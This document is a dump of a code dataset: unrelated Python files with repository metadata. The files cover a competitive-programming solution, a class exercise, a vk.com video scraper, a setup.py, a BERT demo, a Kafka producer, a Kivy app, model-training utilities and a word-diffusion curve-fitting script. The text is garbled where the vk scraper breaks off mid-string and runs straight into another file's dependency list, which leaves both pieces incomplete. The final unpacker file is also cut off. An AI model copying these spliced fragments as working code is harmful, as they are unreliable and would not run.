copy\nN, S = input().split()\nN = int(N)\nresult = 0\ndata = [0,0,0,0]\nrukieiwadata = [[0,0,0,0]]\nfor i in range(N):\n if (S[i] == 'A'):\n data[0] = data[0] + 1\n elif (S[i] == 'G'):\n data[1] = data[1] + 1\n elif (S[i] == 'C'):\n data[2] = data[2] + 1\n else:\n data[3] = data[3] + 1\n rukieiwadata.append(copy.copy(data))\nfor i in range(N+1):\n for j in range(i+1,N+1):\n if ((rukieiwadata[j][0] - rukieiwadata[i][0]) == (rukieiwadata[j][3] - rukieiwadata[i][3]) and (rukieiwadata[j][1] - rukieiwadata[i][1]) == (rukieiwadata[j][2] - rukieiwadata[i][2])):\n print(rukieiwadata[j])\n print(rukieiwadata[i])\n result += 1\nprint(result)","repo_name":"yamaguchitakaaki/AtCoderSource","sub_path":"AtCoder Regular Contest 104/DNA Sequence.py","file_name":"DNA Sequence.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"17019566700","text":"class Cell:\n _cell_symbol = '*'\n\n def __init__(self, cells):\n self._cells = cells\n\n @property\n def cells(self):\n return self._cells\n\n def __add__(self, other):\n return Cell(self.cells + other.cells)\n\n def __sub__(self, other):\n if self.cells > other.cells:\n return Cell(self.cells - other.cells)\n else:\n raise ValueError('Итоговое количество клеток быть больше нуля')\n\n def __mul__(self, other):\n return Cell(self.cells * other.cells)\n\n def __truediv__(self, other):\n div = round(self.cells / other.cells)\n if div > 0:\n return Cell(div)\n else:\n raise ValueError('Итоговое количество клеток быть больше нуля')\n\n def __str__(self):\n return f'{self.cells} cells'\n\n def make_order(self, cell_in_row):\n result = []\n rest = self.cells\n while rest > 0:\n item = str(self._cell_symbol * cell_in_row) if rest > cell_in_row else str(self._cell_symbol * rest)\n result.append(item)\n rest -= cell_in_row\n\n return '\\n'.join(result)\n\n\ncell_1 = Cell(15)\ncell_2 = Cell(38)\n\nprint(cell_1 + cell_2)\nprint(cell_2 - cell_1)\nprint(cell_2 * cell_1)\nprint(cell_2 / cell_1)\nprint('=' * 124)\nprint(cell_1.make_order(4))\nprint('=' * 124)\nprint(cell_2.make_order(7))\nprint('=' * 124)\ntry:\n cell_1 - cell_2\nexcept ValueError as error:\n print(error)\nprint('=' * 124)\ntry:\n cell_1 / cell_2\nexcept ValueError as error:\n print(error)\n","repo_name":"alxrusinov/pythonProject","sub_path":"lesson_7/ex_3.py","file_name":"ex_3.py","file_ext":"py","file_size_in_byte":1593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"29960817756","text":"##################\n### ATTENZIONE ###\n##################\n\n# Richiede login. Al momento vk è sospeso\n\nimport re\nimport cfscrape\nfrom pyquery import PyQuery as pq\nfrom ..utils import FetchException, scrapertools\n\nimport urllib.parse as urlparse\n\nscraper = cfscrape.create_scraper()\n\nclass vk_IE:\n def __init__(self):\n self.regexes = [r\"^(?:https?://)?(?:www\\.)?vk\\.com/video_ext\\.php\\?\"]\n self.aggregate = False\n \n def rewrite(self, url, find):\n for r in self.regexes:\n obj = re.match(r, url)\n if obj:\n d = dict(urlparse.parse_qsl(urlparse.urlsplit(url).query))\n return \"vk.com/video_ext.php?oid={0}&id={1}&hash={2}\".format(d['oid'], d['id'], d['hash'])\n \n raise FetchException.RewriteError()\n \n \n def supports(self, url):\n for r in self.regexes:\n if re.match(r, url):\n return True\n \n return False\n \n \n def get(self, url, headers, bestOnly=True):\n \n html = scraper.get(url, headers=headers).content\n \n d = pq(html)\n \n for e in d('light_cry_dog').items():\n raise FetchException.FileDeleted()\n \n #video_urls = scrapertools.find_multiple_matches(html.decode('utf-8'), 'mp4:\"(.*?.mp4)\",')\n video_urls = scrapertools.find_multiple_matches(html.decode('utf-8'), '\"url[0-9]{3,4}\":\"(.*?)\"')\n \n if video_urls:\n return video_urls\n else:\n raise FetchException.ScriptError()\n\n\n def test(self):\n return []\n\n\n# Returns an array of possible video url's from the page_url\ndef get_video_url(page_url, premium=False, user=\"\", password=\"\", video_password=\"\"):\n logger.info(\"(page_url='%s')\" % page_url)\n\n video_urls = []\n try:\n oid, id = scrapertools.find_single_match(page_url, 'oid=([^&]+)&id=(\\d+)')\n except:\n oid, id = scrapertools.find_single_match(page_url, 'video(\\d+)_(\\d+)')\n\n from core import httptools\n headers = {'User-Agent': 'Mozilla/5.0'}\n url = \"http://vk.com/al_video.php?act=show_inline&al=1&video=%s_%s\" % (oid, id)\n data = httptools.downloadpage(url, headers=headers).data\n\n matches = scrapertools.find_multiple_matches(data, '= 7, < 8\",\n \"colorama >= 0.3.9, < 1\",\n \"imageio >= 2.3.0, < 3\",\n \"numpy >= 1.11.2, < 2\",\n \"pystache >= 0.5.4, < 1\",\n \"requests >= 2, < 3\",\n \"scipy >= 0.1.0, < 2\",\n \"sawmill >= 0.2.1, < 1\",\n \"scikit-image >= 0.15.0, < 1\",\n \"tensorflow >= 1, < 2\"\n]\nDOC_REQUIRES = [\n \"changelog >= 0.4, < 1\",\n \"sphinx >= 1.6, < 2\",\n \"sphinx-click>=1.2.0\",\n \"sphinx_rtd_theme >= 0.1.6, < 1\"\n]\nTEST_REQUIRES = [\n \"pytest-runner >= 2.7, < 3\",\n \"pytest >= 4.4.0, < 5\",\n \"pytest-mock >= 1.1, < 2\",\n \"pytest-xdist >= 1.1, < 2\",\n \"pytest-cov >= 2, < 3\"\n]\n\nsetup(\n name=\"stylish\",\n version=VERSION,\n description=\"Style transfer using deep neural network.\",\n long_description=open(README_PATH).read(),\n url=\"http://github.com/buddly27/stylish\",\n keywords=[\"tensorflow\", \"style\", \"transfer\", \"CNN\"],\n author=\"Jeremy Retailleau\",\n packages=find_packages(SOURCE_PATH),\n package_dir={\n \"\": \"source\"\n },\n include_package_data=True,\n install_requires=INSTALL_REQUIRES,\n tests_require=TEST_REQUIRES,\n extras_require={\n \"doc\": DOC_REQUIRES,\n \"test\": TEST_REQUIRES,\n \"dev\": DOC_REQUIRES + TEST_REQUIRES\n },\n zip_safe=False,\n entry_points={\n \"console_scripts\": [\n \"stylish = stylish.__main__:main\"\n ]\n },\n)\n","repo_name":"buddly27/stylish","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1936,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"50"} +{"seq_id":"11485109509","text":"import torch\nfrom transformers import BertModel\nfrom torch import nn\nfrom transformers import BertTokenizer\n\ntokenizer = BertTokenizer.from_pretrained('bert-base-chinese')\ninput_data = '新装三天空调室内漏水'\ninputs = tokenizer.encode_plus(\n input_data,\n None,\n add_special_tokens=True,\n max_length=512,\n padding='max_length',\n return_token_type_ids=False,\n return_attention_mask=True,\n return_tensors='pt'\n)\ninput_ids = inputs['input_ids']\nattention_mask = inputs['attention_mask']\n\nclass BertClassifier(nn.Module):\n def __init__(self, dropout=0.5):\n super(BertClassifier, self).__init__()\n self.bert = BertModel.from_pretrained('bert-base-chinese')\n self.dropout = nn.Dropout(dropout)\n self.linear = nn.Linear(768, 5)\n self.relu = nn.ReLU()\n\n def forward(self, input_id, mask):\n _, pooled_output = self.bert(input_ids= input_id, attention_mask=mask,return_dict=False)\n dropout_output = self.dropout(pooled_output)\n linear_output = self.linear(dropout_output)\n final_layer = self.relu(linear_output)\n return final_layer\n\n# 读取模型\nmodel = torch.load('full_model.pkl')\n# 将模型设置为评估状态\nmodel.eval()\n# 将输入数据传递给模型进行预测\n\n\noutput = model(input_ids, attention_mask)\n_, predicted = torch.max(output.data, 1)\nprint(predicted)","repo_name":"13060923171/Data_analysis-Algorithmic_combat","sub_path":"pytorch-LSTM、bert分类模型/bert模型/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":1375,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"50"} +{"seq_id":"30066980600","text":"from confluent_kafka import Producer\nimport sys\nfrom datetime import datetime\n\nif __name__ == '__main__':\n\n broker = 'localhost:9093'\n topic = 'test'\n\n conf = {'bootstrap.servers': broker}\n\n # Create Producer instance\n p = Producer(**conf)\n\n # Optional per-message delivery callback (triggered by poll() or flush())\n # when a message has been successfully delivered or permanently\n # failed delivery (after retries).\n def delivery_callback(err, msg):\n if err:\n sys.stderr.write('%% Message failed delivery: %s\\n' % err)\n else:\n sys.stderr.write('%% Message delivered to %s [%d] @ %d\\n' %\n (msg.topic(), msg.partition(), msg.offset()))\n\n def msg_generator(num_messages):\n for i in range(num_messages):\n yield f'message number: {i} - {datetime.now().strftime(\"%Y.%m.%d, %H:%M:%S %f\")}'\n\n # Read lines from stdin, produce each line to Kafka\n for line in msg_generator(1000):\n try:\n # Produce line (without newline)\n p.produce(topic, line, callback=delivery_callback)\n\n except BufferError:\n sys.stderr.write('%% Local producer queue is full (%d messages awaiting delivery): try again\\n' %\n len(p))\n p.poll(0)\n p.produce(topic, 'the end', callback=delivery_callback)\n p.poll(0)\n # Wait until all messages have been delivered\n sys.stderr.write('%% Waiting for %d deliveries\\n' % len(p))\n p.flush()","repo_name":"Tsezia/kafka","sub_path":"producer.py","file_name":"producer.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"29384500771","text":"from kivy.app import App\n\nfrom kivy.uix.gridlayout import GridLayout\nfrom kivy.uix.label import Label\nfrom kivy.uix.textinput import TextInput\n\n\nclass MainScreen(GridLayout):\n def __init__(self,**kwargs):\n super(MainScreen,self).__init__(**kwargs) # implements the features of a GridLayout (the base class of MinScreen)\n self.cols=3\n \n l1=Label(text='Workout')\n l2=Label(text='Day')\n l3=Label(text='Time')\n\n in1=TextInput(multiline=False) # multiline determines if more than one line of text is allowed (optional argument)\n in2=TextInput(multiline=False)\n in3=TextInput(multiline=False)\n\n self.add_widget(l1) # Adds widgets to the layout\n self.add_widget(l2)\n self.add_widget(l3)\n self.add_widget(in1)\n self.add_widget(in2)\n self.add_widget(in3)\n \n\nclass WorkoutApp(App): # Inherits all properties of App \n def build(self):\n return MainScreen()\n\n\nif __name__=='__main__':\n WorkoutApp().run() # run() is a method of kivy App class\n\n\n","repo_name":"adasilva/intro_kivy","sub_path":"01_buildingblocks/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1063,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"29"} +{"seq_id":"2681255443","text":"from flask import Flask\nimport json\n\napp = Flask(__name__)\n\n@app.route(\"/\")\ndef hello():\n dictValue = {'key1':'value1','key2':'value2'}\n return json.dumps(dictValue)\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0',port=9090)\n","repo_name":"yuezhongtao/python-demos","sub_path":"flask-server/hello.py","file_name":"hello.py","file_ext":"py","file_size_in_byte":239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"34536550103","text":"# coding=utf-8\n\n\n\"\"\"Utilities for logging and serialization\"\"\"\n\nimport os\nimport random\nimport numpy as np\nimport torch\nimport time\n\nfrom fp16 import FP16_Optimizer\nimport mpu\nimport deepspeed\nfrom apex.optimizers import FusedAdam as Adam\nfrom fp16 import FP16_Module\nfrom fp16 import FP16_Optimizer\nfrom learning_rates import AnnealingLR\nfrom model import EncDecModel, EncDecConfig\nfrom model import (\n enc_dec_get_params_for_weight_decay_optimization,\n enc_dec_get_params_for_prompt_optimization,\n)\n\nfrom model import DistributedDataParallel as DDP\n\ndef print_rank_0(message):\n if torch.distributed.is_initialized():\n if torch.distributed.get_rank() == 0:\n print(message, flush=True)\n else:\n print(message, flush=True)\n\n\ndef print_args(args):\n \"\"\"Print arguments.\"\"\"\n\n print('arguments:', flush=True)\n for arg in vars(args):\n dots = '.' * (29 - len(arg))\n print(' {} {} {}'.format(arg, dots, getattr(args, arg)), flush=True)\n\n\ndef save_rank_0(args, message):\n if torch.distributed.is_initialized():\n if torch.distributed.get_rank() == 0:\n with open(args.log_file, \"a\") as f:\n f.write(message + \"\\n\")\n f.flush()\n else:\n with open(args.log_file, \"a\") as f:\n f.write(message + \"\\n\")\n f.flush()\n\n\ndef get_model(args, vocab_size, prompt_config=None):\n \"\"\"Build the model.\"\"\"\n\n print_rank_0('building Enc-Dec model ...')\n config = EncDecConfig.from_json_file(args.model_config)\n config.vocab_size = vocab_size\n model = EncDecModel(config,\n parallel_output=True,\n checkpoint_activations=args.checkpoint_activations,\n checkpoint_num_layers=args.checkpoint_num_layers,\n prompt_config=prompt_config)\n\n if mpu.get_data_parallel_rank() == 0:\n print(' > number of parameters on model parallel rank {}: {}'.format(\n mpu.get_model_parallel_rank(),\n sum([p.nelement() for p in model.parameters()])), flush=True)\n\n # To prevent OOM for model sizes that cannot fit in GPU memory in full precision\n if args.deepspeed and args.fp16:\n model.half()\n\n # GPU allocation.\n model.cuda(torch.cuda.current_device())\n if args.prompt_tune and prompt_config[\"init_scratch\"]:\n model.init_prompt_embeds()\n\n # Fp16 conversion.\n if args.fp16:\n model = FP16_Module(model)\n\n # Wrap model for distributed training.\n model = DDP(model)\n\n return model\n\n\ndef get_optimizer(model, args, prompt_config=None):\n \"\"\"Set up the optimizer.\"\"\"\n\n # Build parameter groups (weight decay and non-decay).\n while isinstance(model, (DDP, FP16_Module)):\n model = model.module\n if args.prompt_tune and prompt_config[\"fix_model\"]:\n param_groups = enc_dec_get_params_for_prompt_optimization(model)\n else:\n param_groups = enc_dec_get_params_for_weight_decay_optimization(model)\n \n # Add model parallel attribute if it is not set.\n for param_group in param_groups:\n for param in param_group['params']:\n if not hasattr(param, 'model_parallel'):\n param.model_parallel = False\n\n if args.cpu_optimizer:\n if args.cpu_torch_adam:\n cpu_adam_optimizer = torch.optim.Adam\n else:\n from deepspeed.ops.adam import DeepSpeedCPUAdam\n cpu_adam_optimizer = DeepSpeedCPUAdam\n optimizer = cpu_adam_optimizer(param_groups,\n lr=args.lr, weight_decay=args.weight_decay)\n else:\n # Use FusedAdam.\n optimizer = Adam(param_groups,\n lr=args.lr, weight_decay=args.weight_decay)\n\n print(f'Optimizer = {optimizer.__class__.__name__}')\n if args.deepspeed:\n # fp16 wrapper is not required for DeepSpeed.\n return optimizer\n\n # Wrap into fp16 optimizer.\n if args.fp16:\n optimizer = FP16_Optimizer(optimizer,\n static_loss_scale=args.loss_scale,\n dynamic_loss_scale=args.dynamic_loss_scale,\n dynamic_loss_args={\n 'scale_window': args.loss_scale_window,\n 'min_scale': args.min_scale,\n 'delayed_shift': args.hysteresis})\n\n if torch.distributed.get_rank() == 0:\n print(optimizer.param_groups)\n\n return optimizer\n\n\ndef get_learning_rate_scheduler(optimizer, args):\n \"\"\"Build the learning rate scheduler.\"\"\"\n\n # Add linear learning rate scheduler.\n if args.lr_decay_iters is not None:\n num_iters = args.lr_decay_iters\n else:\n num_iters = args.train_iters\n num_iters = max(1, num_iters)\n init_step = -1\n if args.warmup_iter > 0:\n warmup_iter = args.warmup_iter\n else:\n warmup_iter = args.warmup * num_iters\n lr_scheduler = AnnealingLR(optimizer,\n start_lr=args.lr,\n warmup_iter=warmup_iter,\n num_iters=num_iters,\n decay_style=args.lr_decay_style,\n last_iter=init_step,\n gradient_accumulation_steps=args.gradient_accumulation_steps)\n\n return lr_scheduler\n\n\ndef setup_model_and_optimizer(args, vocab_size, ds_config, prompt_config=None):\n \"\"\"Setup model and optimizer.\"\"\"\n\n model = get_model(args, vocab_size, prompt_config)\n optimizer = get_optimizer(model, args, prompt_config)\n lr_scheduler = get_learning_rate_scheduler(optimizer, args)\n\n if args.deepspeed:\n print_rank_0(\"DeepSpeed is enabled.\")\n\n model, optimizer, _, lr_scheduler = deepspeed.initialize(\n model=model,\n optimizer=optimizer,\n args=args,\n lr_scheduler=lr_scheduler,\n mpu=mpu,\n dist_init_required=False,\n config_params=ds_config\n )\n\n print(args.load)\n if args.load is not None:\n args.iteration = load_checkpoint(model, optimizer, lr_scheduler, args, prompt_config)\n else:\n args.iteration = 0\n\n return model, optimizer, lr_scheduler\n\n\ndef set_deepspeed_activation_checkpointing(args):\n\n deepspeed.checkpointing.configure(mpu, deepspeed_config=args.deepspeed_config, num_checkpoints=args.num_checkpoints)\n mpu.checkpoint = deepspeed.checkpointing.checkpoint\n mpu.get_cuda_rng_tracker = deepspeed.checkpointing.get_cuda_rng_tracker\n mpu.model_parallel_cuda_manual_seed = deepspeed.checkpointing.model_parallel_cuda_manual_seed\n\n\ndef initialize_distributed(args):\n \"\"\"Initialize torch.distributed.\"\"\"\n\n # Manually set the device ids.\n device = args.rank % torch.cuda.device_count()\n if args.local_rank is not None:\n device = args.local_rank\n torch.cuda.set_device(device)\n # Call the init process\n deepspeed.init_distributed()\n\n # Set the model-parallel / data-parallel communicators.\n mpu.initialize_model_parallel(args.model_parallel_size)\n\n # Optional DeepSpeed Activation Checkpointing Features\n if args.deepspeed and args.deepspeed_activation_checkpointing:\n set_deepspeed_activation_checkpointing(args)\n\n\ndef set_random_seed(seed):\n \"\"\"Set random seed for reproducability.\"\"\"\n\n if seed is not None and seed > 0:\n random.seed(seed)\n np.random.seed(seed)\n torch.manual_seed(seed)\n mpu.model_parallel_cuda_manual_seed(seed)\n\n\ndef save_checkpoint(iteration, model, optimizer,\n lr_scheduler, args, save_dir=None):\n \"\"\"Save a model checkpoint.\"\"\"\n save_ds_checkpoint(iteration, model, args, save_dir)\n\n # Wait so everyone is done (necessary)\n torch.distributed.barrier()\n # And update the latest iteration\n if torch.distributed.get_rank() == 0:\n tracker_filename = os.path.join(args.save, 'latest_checkpointed_iteration.txt')\n with open(tracker_filename, 'w') as f:\n f.write(str(iteration))\n # Wait so everyone is done (not necessary)\n torch.distributed.barrier()\n\n\ndef save_ds_checkpoint(iteration, model, args, save_dir=None):\n \"\"\"Save a model checkpoint.\"\"\"\n\n sd = {}\n sd['iteration'] = iteration\n\n if args.save_prompt_only:\n prompt = model.module.module.module.get_prompt_embeds()\n save_prompt(args.save if save_dir is None else save_dir, iteration, prompt[\"encoder\"])\n else:\n model.save_checkpoint(args.save if save_dir is None else save_dir, str(iteration), client_state = sd, save_zero=False)\n\n\ndef save_prompt(save_dir, iteration, prompt_embeds):\n save_path = os.path.join(save_dir, \"prompt-{}.pt\".format(iteration))\n if torch.distributed.get_rank() == 0:\n torch.save(prompt_embeds, save_path)\n\n\ndef get_checkpoint_iteration(args):\n # Read the tracker file and set the iteration.\n tracker_filename = os.path.join(args.load, 'latest_checkpointed_iteration.txt')\n if not os.path.isfile(tracker_filename):\n print_rank_0('WARNING: could not find the metadata file {} '.format(\n tracker_filename))\n print_rank_0(' will not load any checkpoints and will start from '\n 'random')\n return 0, False, False\n iteration = 0\n release = False\n with open(tracker_filename, 'r') as f:\n metastring = f.read().strip()\n try:\n iteration = int(metastring)\n except ValueError:\n release = metastring == 'release'\n if not release:\n print_rank_0('ERROR: Invalid metadata file {}. Exiting'.format(\n tracker_filename))\n exit()\n\n assert iteration > 0 or release, 'error parsing metadata file {}'.format(\n tracker_filename)\n \n return iteration, release, True\n\n\ndef load_prompt(load_dir):\n prompt = torch.load(load_dir, map_location=lambda storage, loc: storage)\n return prompt\n\n\ndef load_checkpoint(model, optimizer, lr_scheduler, args, prompt_config=None):\n \"\"\"Load a model checkpoint.\"\"\"\n\n iteration, release, success = get_checkpoint_iteration(args)\n\n if not success:\n return 0\n\n mp_rank = mpu.get_model_parallel_rank()\n checkpoint_name = os.path.join(args.load,\n str(iteration),\n 'mp_rank_{:02d}'.format(mp_rank) + '_model_states.pt')\n\n if not os.path.exists(checkpoint_name):\n print('Client provided checkpoint load path: {} does not exist ... skip checkpoint load'.format(checkpoint_name))\n if mpu.get_data_parallel_rank() == 0:\n print(\"Unable to load checkpoint.\")\n return iteration\n\n print('loading checkpoint: {}'.format(checkpoint_name))\n sd = torch.load(checkpoint_name, map_location=lambda storage, loc: storage)\n\n if args.prompt_tune:\n load_prompt_path = prompt_config.get(\"load_prompt\")\n if load_prompt_path is not None and len(load_prompt_path) > 0:\n prompt_embeds = load_prompt(load_prompt_path)\n sd[\"module\"][\"encoder.prompt_embeds.weight\"] = prompt_embeds \n\n model.module.load_state_dict(sd[\"module\"], strict=False)\n\n iteration = sd['iteration']\n\n torch.distributed.barrier()\n if mpu.get_data_parallel_rank() == 0:\n print(' successfully loaded {}'.format(checkpoint_name))\n\n return iteration\n\n\nclass Timers:\n \"\"\"Group of timers.\"\"\"\n\n class Timer:\n \"\"\"Timer.\"\"\"\n\n def __init__(self, name):\n self.name_ = name\n self.elapsed_ = 0.0\n self.started_ = False\n self.start_time = time.time()\n\n def start(self):\n \"\"\"Start the timer.\"\"\"\n assert not self.started_, 'timer has already been started'\n torch.cuda.synchronize()\n self.start_time = time.time()\n self.started_ = True\n\n def stop(self):\n \"\"\"Stop the timer.\"\"\"\n assert self.started_, 'timer is not started'\n torch.cuda.synchronize()\n self.elapsed_ += (time.time() - self.start_time)\n self.started_ = False\n\n def reset(self):\n \"\"\"Reset timer.\"\"\"\n self.elapsed_ = 0.0\n self.started_ = False\n\n def elapsed(self, reset=True):\n \"\"\"Calculate the elapsed time.\"\"\"\n started_ = self.started_\n # If the timing in progress, end it first.\n if self.started_:\n self.stop()\n # Get the elapsed time.\n elapsed_ = self.elapsed_\n # Reset the elapsed time\n if reset:\n self.reset()\n # If timing was in progress, set it back.\n if started_:\n self.start()\n return elapsed_\n\n def __init__(self):\n self.timers = {}\n\n def __call__(self, name):\n if name not in self.timers:\n self.timers[name] = self.Timer(name)\n return self.timers[name]\n\n def log(self, names, normalizer=1.0, reset=True):\n \"\"\"Log a group of timers.\"\"\"\n assert normalizer > 0.0\n string = 'time (ms)'\n for name in names:\n elapsed_time = self.timers[name].elapsed(\n reset=reset) * 1000.0 / normalizer\n string += ' | {}: {:.2f}'.format(name, elapsed_time)\n print_rank_0(string)\n","repo_name":"thu-coai/PPT","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":13399,"program_lang":"python","lang":"en","doc_type":"code","stars":94,"dataset":"github-code","pt":"29"} +{"seq_id":"28995405818","text":"from lmfit.models import StepModel, ConstantModel, LognormalModel\nfrom scipy.misc import derivative\nfrom multiprocessing import Pool\nfrom functools import partial\nimport pandas as pd\nimport numpy as np\nfrom math import *\nimport argparse\nimport logging\nimport math\n\n# log\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\nhandler = logging.FileHandler(\"./log/selection_categorization.log\")\nhandler.setFormatter(logging.Formatter(\"%(asctime)s; %(levelname)s; %(message)s\"))\nlogger.addHandler(handler)\n\n# args\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--path_df\", type=str, help=\"path to the dataframe containing the new forms and their usage rate per month\")\nparser.add_argument(\"--path_dfRel\", type=str, help=\"path to the dataframe containing the new forms and their relative usage rate per month\")\nparser.add_argument(\"--path_out\", type=str, help=\"Path to the directory containing the output\")\nargs = parser.parse_args()\n\npath_df = args.path_df\npath_dfRel = args.path_dfRel\npath_out = args.path_out\n\nlogger.info(\"path_df : \"+path_df+\" ; path_dfRel : \"+path_dfRel+\" ; path_out : \"+path_out)\n\nlogger.info(\"Fitting the curves for the new words to the two reference functions: logistic and logNormal.\")\n\ndf_5years = pd.read_csv(path_df, index_col=0)\ndf_5years_rel = pd.read_csv(path_dfRel, index_col=0)\ndf_5years_rel = df_5years_rel.set_index(df_5years.form)\ndf_5years = df_5years.set_index(\"form\")\n\ndf_final = df_5years.copy()\n\n# We add for all forms a first month at 0.\ndf_5years = df_5years.rename(columns={str(e):str(int(e)+1) for e in range(60)})\ndf_5years.insert(loc=0,column=\"0\",value=0.0)\ndf_5years_rel = df_5years_rel.rename(columns={str(e):str(int(e)+1) for e in range(60)})\ndf_5years_rel.insert(loc=0,column=\"0\",value=0.0)\n\n# We divide tokens according to whether they are hashtags, words, symbols or other.\nhashtags = df_5years[df_5years.index.str.startswith(\"#\")]\nsymb = df_5years[df_5years.index.str.contains(r\"^\\W+$\")]\nwords = df_5years[df_5years.index.str.contains(r\"^(\\w|-|')+$\")]\nothers = df_5years[(~df_5years.index.isin(hashtags)) & (~df_5years.index.isin(symb)) & (~df_5years.index.isin(words))]\n\nlogger.info(str(len(words))+\" words (any sequence of alpha-numeric characters, which may contain an apostrophe or a dash).\")\n\n# curve fitting function from a reference function (logNormal or logistic)\nlogNormal_model = LognormalModel()\nlogistic_model=StepModel(form='logistic')\ndef fit(form, log=False) : \n \n x = [i for i in range(61)]\n y=df_5years_rel.loc[form].rolling(window=3, min_periods=0).mean()\n \n if log :\n\n params=logistic_model.guess(y, x=x)\n model = logistic_model \n \n else :\n params=logNormal_model.guess(y, x=x)\n params.add(\"sigma\", value=2)\n model = logNormal_model \n \n result = model.fit(y, params, x=x)\n\n if log : \n\n return {'form':form,\n 'sigma':result.params['sigma'].value,\n 'sigma_err':result.params['sigma'].stderr,\n 'center':result.params['center'].value,\n 'center_err':result.params['center'].stderr,\n 'amplitude':result.params['amplitude'].value,\n 'amplitude_er':result.params['amplitude'].stderr, \n 'redchi':result.redchi,\n 'chisqr':result.chisqr}\n\n else : \n maxPoint = np.where(result.best_fit==np.max(result.best_fit))[0][0]\n return {'form':form,\n 'sigma':result.params['sigma'].value,\n 'sigma_err':result.params['sigma'].stderr,\n 'center':result.params['center'].value,\n 'center_err':result.params['center'].stderr,\n 'amplitude':result.params['amplitude'].value,\n 'amplitude_er':result.params['amplitude'].stderr,\n 'height':result.params['height'].value,\n 'height_err':result.params['height'].stderr,\n 'fwhm':result.params['fwhm'].value,\n 'fwhm_err':result.params['fwhm'].stderr,\n 'redchi':result.redchi,\n 'chisqr':result.chisqr,\n 'maxPoint':maxPoint}\n\n# return the diffusion phases of a word\ndef phases_delimitation(form, log=False) : \n \n x = [i for i in range(61)]\n y=df_5years_rel.loc[form].rolling(window=3, min_periods=0).mean()\n \n if log :\n\n params=logistic_model.guess(y, x=x)\n model = logistic_model \n \n else :\n params=logNormal_model.guess(y, x=x)\n params.add(\"sigma\", value=2)\n model = logNormal_model \n \n result = model.fit(y, params, x=x)\n\n # detection of diffusion phases\n def f(x) : \n ampl = result.params['amplitude'].value\n sigma = result.params['sigma'].value\n center = result.params['center'].value \n if log : \n return ampl*(1-(1/(1+math.exp((x-center)/sigma))))\n else : \n return (ampl/(sigma*math.sqrt(2*math.pi)))*((math.exp(-((math.log(x)-center)**2/(2*sigma**2))))/x)\n\n maxPoint = np.where(result.best_fit==np.max(result.best_fit))[0][0]\n\n values_deriv_3 = []\n if log : \n for x2 in range(0,61) : \n values_deriv_3.append(derivative(f, x2, n=3, order=5, dx=1))\n else : \n values_deriv_3=[0]\n for x2 in range(1,61) : \n values_deriv_3.append(derivative(f, x2, n=3, order=5, dx=0.1))\n\n periods = {\"innovation\":(min(x), values_deriv_3.index(max(values_deriv_3[:values_deriv_3.index(min(values_deriv_3))]))), \n \"propagation\":(values_deriv_3.index(max(values_deriv_3[:values_deriv_3.index(min(values_deriv_3))])), values_deriv_3.index(max(values_deriv_3[values_deriv_3.index(min(values_deriv_3)):]))),\n \"fixation\":(values_deriv_3.index(max(values_deriv_3[values_deriv_3.index(min(values_deriv_3)):])), max(x))}\n\n return (form,periods)\n\npool = Pool()\n\n# We retrieve the results of the curve fitting for the two reference functions: logistic and logNormal, for all new tokens identified as words\nlmfit_results = pool.map(partial(fit, log=True), words.index.tolist())\ndf_log = pd.DataFrame.from_records(lmfit_results, index=\"form\")\ndf_log.to_csv(path_out+\"05_lmfit_logistic_words.csv\")\n\nlmfit_results = pool.map(partial(fit, log=False), words.index.tolist())\ndf_logNorm= pd.DataFrame.from_records(lmfit_results, index=\"form\")\ndf_logNorm.to_csv(path_out+\"05_lmfit_logNorm_words.csv\")\n\nlogger.info(\"Fitting the curves for the new words to the two reference functions: logistic and logNormal - ended.\")\nlogger.info(\"Saving the results of these fits in the files\"+path_out+\"05_lmfit_logistic_words.csv and \"+path_out+\"05_lmfit_logNorm_words.csv.\")\n\nlogger.info(\"Categorization of words as change or buzz.\")\n# We only select words used by at least 200 users.\ndf = df_5years[df_5years.nbUsers_period>=200]\ndf_log_min200 = df_log[df_log.index.isin(df.index)]\ndf_logNorm_min200 = df_logNorm[df_logNorm.index.isin(df.index)]\n\n# Sorting on the output parameters of the logistic and lognormal curve fit\nlogNorm_select = df_logNorm_min200[(df_logNorm_min200.fwhm>=4) & (df_logNorm_min200.fwhm<=40) & (df_logNorm_min200.redchi<=0.00005) & (df_logNorm_min200.amplitude<=1.1) & (df_logNorm_min200.maxPoint>=21) & (df_logNorm_min200.maxPoint<=46) & (((df_logNorm_min200.center<=3.6) & (df_logNorm_min200.sigma<=0.65)) | ((df_logNorm_min200.center>3.6) & (df_logNorm_min200.center<=3.8) & (df_logNorm_min200.sigma<=0.35)) | ((df_logNorm_min200.center>3.8) & (df_logNorm_min200.sigma<=0.15)))]\nlogistic_select = df_log_min200[(((df_log_min200.center>=16) & (df_log_min200.center<=31) & (df_log_min200.sigma<=8)) | ((df_log_min200.center>31) & (df_log_min200.center<=46) & (df_log_min200.sigma<=7))) & (df_log_min200.redchi<0.00005) & (df_log_min200.amplitude>0.02) & (df_log_min200.center_err<5)]\n\nlogger.info(\"Categorization of words as change or buzz - ended.\")\n\n# to treat the possible cases where a word is classified in both categories\nfor form in logistic_select.index : \n if form in logNorm_select.index : \n if logistic_select.loc[form,\"redchi\"]= 5:\n break\n\n return data_vi\n\n\nclass ZipUnpacker(Unpacker, Fabricator):\n\n\n @classmethod\n def _is_check_for(cls, check):\n return check == '.zip'\n \n def unpack(self):\n\n with ZipFile(self.in_path, 'r') as g:\n inside = g.infolist()\n for ig in inside:\n try:\n g.extract(ig, 